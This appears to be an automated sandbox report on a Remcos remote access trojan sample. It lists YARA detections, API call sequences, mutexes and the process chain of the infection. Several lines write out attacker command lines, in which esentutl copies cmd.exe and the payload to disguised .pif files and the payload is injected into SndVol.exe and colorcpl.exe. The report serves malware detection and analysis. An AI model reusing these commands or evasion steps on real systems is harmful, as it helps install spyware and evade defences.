Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: Process Memory Space: SndVol.exe PID: 7944, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 5288, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 4540, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@20/11@5/2

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	9_2_00415C90
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048F6A28 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	9_2_048F6A28
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	13_2_00415C90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D46A28 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	13_2_06D46A28

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Code function: 0_2_02EB7FE2 GetDiskFreeSpaceA,

0_2_02EB7FE2

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Code function: 0_2_02ECAD9C CreateToolhelp32Snapshot,

0_2_02ECAD9C

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Code function: 0_2_02EC6DD8 CoCreateInstance,

0_2_02EC6DD8

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,

9_2_00419493

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

9_2_00418A00

Source: C:\Users\user\Desktop\1m181Ru74o.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Windows\SysWOW64\SndVol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Windows\SysWOW64\SndVol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-YHG91Z
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1m181Ru74o.exe	ReversingLabs: Detection: 65%
Source: 1m181Ru74o.exe	Virustotal: Detection: 83%

Source: C:\Users\user\Desktop\1m181Ru74o.exe

File read: C:\Users\user\Desktop\1m181Ru74o.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1m181Ru74o.exe "C:\Users\user\Desktop\1m181Ru74o.exe"
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\dlftfmtN.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\1m181Ru74o.exe /d C:\\Users\\Public\\Libraries\\Ntmftfld.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: unknown	Process created: C:\Users\Public\Libraries\Ntmftfld.PIF "C:\Users\Public\Libraries\Ntmftfld.PIF"
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: unknown	Process created: C:\Users\Public\Libraries\Ntmftfld.PIF "C:\Users\Public\Libraries\Ntmftfld.PIF"
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\dlftfmtN.cmd" "	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\1m181Ru74o.exe /d C:\\Users\\Public\\Libraries\\Ntmftfld.PIF /o	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Section loaded: amsi.dll	Jump to behavior
